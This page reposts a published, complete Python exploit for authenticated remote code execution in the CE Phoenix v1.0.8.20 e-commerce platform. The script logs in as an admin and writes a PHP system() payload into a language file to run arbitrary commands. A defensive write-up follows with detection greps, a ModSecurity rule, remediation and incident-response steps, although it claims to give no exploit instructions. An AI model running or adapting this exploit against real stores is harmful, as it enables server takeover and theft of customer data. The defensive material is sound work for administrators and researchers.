CE Phoenix v1.0.8.20 - Remote Code Execution

Exploit Author: tmrswrr Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2024-04-02

## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)
#### Date: 2023-11-25
#### Exploit Author: tmrswrr
#### Category: Webapps
#### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)
#### Version: v1.0.8.20
#### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)

## EXPLOIT :

import requests
from bs4 import BeautifulSoup
import sys
import urllib.parse
import random
from time import sleep

class colors:
    OKBLUE = '\033[94m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    CBLACK = '\33[30m'
    CRED = '\33[31m'
    CGREEN = '\33[32m'
    CYELLOW = '\33[33m'
    CBLUE = '\33[34m'
    CVIOLET = '\33[35m'
    CBEIGE = '\33[36m'
    CWHITE = '\33[37m'

 
def entry_banner():
    color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,
                    colors.CRED, colors.CBEIGE]
    random.shuffle(color_random)

    banner = color_random[0] + """
     CE Phoenix v1.0.8.20 - Remote Code Execution \n
     Author: tmrswrr
    """
    for char in banner:
        print(char, end='')
        sys.stdout.flush()
        sleep(0.0045)

def get_formid_and_cookies(session, url):
    response = session.get(url, allow_redirects=True)
    if response.ok:
        soup = BeautifulSoup(response.text, 'html.parser')
        formid_input = soup.find('input', {'name': 'formid'})
        if formid_input:
            return formid_input['value'], session.cookies
    return None, None

def perform_exploit(session, url, username, password, command):
    print("\n[+] Attempting to exploit the target...")

   
    initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php"
    formid, cookies = get_formid_and_cookies(session, initial_url)
    if not formid:
        print("[-] Failed to retrieve initial formid.")
        return

    # Login
    print("[+] Performing login...")
    login_payload = {
        'formid': formid,
        'username': username,
        'password': password
    }
    login_headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
        'Referer': initial_url
    }
    login_url = url + "/admin/login.php?action=process"
    login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True)

    if not login_response.ok:
        print("[-] Login failed.")
        print(login_response.text)
        return

    print("[+] Login successful.")


    new_formid, _ = get_formid_and_cookies(session, login_response.url)
    if not new_formid:
        print("[-] Failed to retrieve new formid after login.")
        return

    # Exploit
    print("[+] Executing the exploit...")
    encoded_command = urllib.parse.quote_plus(command)
    exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B"
    exploit_headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
        'Referer': login_response.url
    }
    exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save"
    exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True)

    if exploit_response.ok:
        print("[+] Exploit executed successfully.")
    else:
        print("[-] Exploit failed.")
        print(exploit_response.text)

    
    final_response = session.get(url)
    print("\n[+] Executed Command Output:\n")
    print(final_response.text)  

def main(base_url, username, password, command):
    print("\n[+] Starting the exploitation process...")
    session = requests.Session()
    perform_exploit(session, base_url, username, password, command)

if __name__ == "__main__":
    entry_banner()

    if len(sys.argv) < 5:
        print("Usage: python script.py [URL] [username] [password] [command]")
        sys.exit(1)

    base_url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    command = sys.argv[4]

    main(base_url, username, password, command)

CE Phoenix v1.0.8.20 — Remote Code Execution (RCE): Overview, Impact, Detection, and Remediation

CE Phoenix is an open-source e-commerce platform. In version v1.0.8.20 a vulnerability was reported that can lead to remote code execution (RCE) under certain conditions. This article summarizes the vulnerability at a high level, the likely impact, safe detection techniques, remediation and hardening guidance, and secure development practices. The goal is to inform administrators, defenders and developers without providing exploit instructions.

High-level summary

At a conceptual level, the issue arises from a server-side feature that allows editing or saving language/translation files via the administrative interface. If that feature accepts and persists arbitrary content into files that are later interpreted as PHP, an attacker with access to a privileged account (or who can abuse the administrative workflow) may be able to inject PHP code that the server will execute. The result is server-side command execution or full compromise of the web application host.

Why this class of vulnerability is dangerous

RCE allows attackers to run arbitrary commands, escalate privileges, exfiltrate data, and establish persistence.
Language or configuration files are often loaded by many requests and run with the same privileges as the web server, increasing blast radius.
If attackers can write PHP into files under webroot, they can drop web shells, bypass controls and pivot within the environment.

Typical root causes (high-level)

Insufficient input validation or sanitization when saving user-supplied content to files.
Improper assumptions that only trusted administrators will use editing features; missing role or intent checks.
Saving content directly into executable PHP files (instead of data-only formats) without escaping/encoding.
Weak authentication, missing CSRF protections, or session handling flaws that allow an attacker to perform actions as an admin.

Impact and risk assessment

Severity depends on several factors:

Presence of an unpatched vulnerable version (e.g., v1.0.8.20 in this case).
Whether an attacker can authenticate as an admin or abuse an administrative workflow (credential theft, weak passwords, CSRF, or other flaws).
File system layout — if language files are stored inside webroot and parsed as PHP, risk is high.
Server privileges — code executed under web server account may access DB credentials, config files, or other sensitive data.

Detection and forensics (safe, defensive checks)

Focus on non-destructive checks that reveal indicators of compromise (IoCs) or vulnerable configuration. Do not attempt exploitation.

Quick checks

Inventory versions: verify application version (vendor advisory or package metadata) to know if the host is affected.
File integrity: compare language/configuration files against known-good copies or source tree to detect unexpected changes.
Scan for PHP tags in files that should only contain translations or data: look for "<?php" or "<?= " in translation files.

# Defensive example: find any PHP opening tags in the language folder (Linux shell)
# This is for detection of unexpected PHP code in files that should be data-only.
grep -R --line-number -E "<\?php|<\?" /path/to/cephoenix/admin/languages || true

Explanation: The command searches the language file directory recursively for PHP opening tags. If language or translation files contain "<?php" it is a strong indicator that executable code was injected. This is a passive inspection command for defenders and incident responders.

Log and session checks

Review web server/access logs for POST requests to admin functions or language-editor endpoints, especially outside maintenance windows or from unusual IPs.
Examine application logs for account login anomalies, multiple failed logins, or suspicious admin sessions.
Check for new or modified admin accounts and changes to user roles.

Remediation and mitigation

Take immediate, prioritized actions based on your environment and risk tolerance.

Immediate mitigations (short-term)

Restrict access to the administrative interface via network controls (VPN, IP allowlists, firewall rules) to only trusted networks and administrators.
Apply a Web Application Firewall (WAF) rule to block POST bodies containing PHP tags or suspicious payloads for endpoints that accept file or content edits.
Rotate credentials for any accounts with administrative privileges if compromise is suspected.
Inspect language and configuration files; if modified unexpectedly, restore from trusted backups and treat the host as potentially compromised.

Recommended long-term fixes

Upgrade to a vendor-published patched version as soon as possible. Verify the vendor advisory and apply the official patch.
Ensure server-side input validation: do not accept or persist executable language content. Store translations as data-only (e.g., JSON, INI) rather than PHP code when possible.
Harden file permissions: configuration and language files should be writable only by deployment processes, not by the web server user.
Implement multi-factor authentication (MFA) for administrative accounts and enforce strong password policies.
Add CSRF protections and strict role checks for any feature that writes files or modifies code-like content.

Secure development practices — examples and code

Below are safe code examples showing defensive approaches in PHP and a conceptual pattern for avoiding executable content write. These are for developers to harden the application; they do not demonstrate exploitation.

<?php
// Defensive example: save translation strings as JSON, not PHP executable code.
// Input: $_POST['translations'] expected to be an associative array of keys -> values.

// Validate and sanitize input
$input = $_POST['translations'] ?? null;
if (!is_array($input)) {
    http_response_code(400);
    exit('Invalid translations payload');
}

// Basic sanitation: ensure values are strings and strip control characters
$sanitized = [];
foreach ($input as $k => $v) {
    $key = preg_replace('/[^a-zA-Z0-9_\-\.]/', '', (string)$k);
    $val = (string)$v;
    // Remove null bytes and control chars to avoid file injection tricks
    $val = preg_replace('/[\\x00-\\x1F\\x7F]/', '', $val);
    $sanitized[$key] = $val;
}

// Persist as JSON (data-only) outside webroot if possible
$dataDir = __DIR__ . '/../data/languages/';
if (!is_dir($dataDir)) {
    mkdir($dataDir, 0750, true);
}
$filePath = $dataDir . 'english.json';
file_put_contents($filePath, json_encode($sanitized, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE), LOCK_EX);
?>

Explanation: This snippet demonstrates storing translation data as a JSON file rather than writing PHP code. It validates that input is an array, sanitizes keys and values to remove suspicious characters, and writes the file with safe permissions. Storing data outside webroot prevents direct execution even if content is malformed.

// Example ModSecurity rule (conceptual defensive pattern) to block PHP tags in POST bodies.
// NOTE: Adapt and test in your environment; this is illustrative.
SecRule REQUEST_METHOD "POST" "phase:2,chain,deny,status:403,msg:'Blocked potential PHP injection in POST body'"
SecRule REQUEST_URI "@beginsWith /admin/" "chain"
SecRule REQUEST_BODY|ARGS|XML:/* "@rx <\?(php|=)" "t:none"

Explanation: This ModSecurity-style rule is a defensive pattern to block POSTs to admin endpoints that contain PHP opening tags. It is an example and should be tested carefully to avoid false positives. WAF rules can be a useful temporary control until a proper patch is applied.

Incident response checklist

Step	Action
Containment	Isolate affected hosts from network, restrict admin access, revoke compromised credentials.
Eradication	Remove injected files, restore from verified backups, apply vendor patches.
Recovery	Rebuild and redeploy compromised hosts, rotate secrets, re-enable services gradually while monitoring.
Lessons learned	Conduct root cause analysis, update secure coding and deployment processes, schedule patching cadence.

Expert recommendations and best practices

Assume admin-facing features are high-risk: apply stricter validation, logging, and multi-factor authentication.
Prefer data-only formats for editable content; avoid writing executable language/config files from user input.
Keep a minimal attack surface: block or restrict access to admin directories at the network level where feasible.
Maintain an up-to-date asset inventory and prioritize patching for internet-facing e-commerce platforms.
Implement file integrity monitoring (FIM) for critical files so suspicious changes trigger alerts immediately.

Final note

If you manage CE Phoenix installations, check vendor advisories for this version and apply official patches promptly. If you suspect compromise, follow your incident response plan and treat affected hosts as potentially fully compromised until proven otherwise.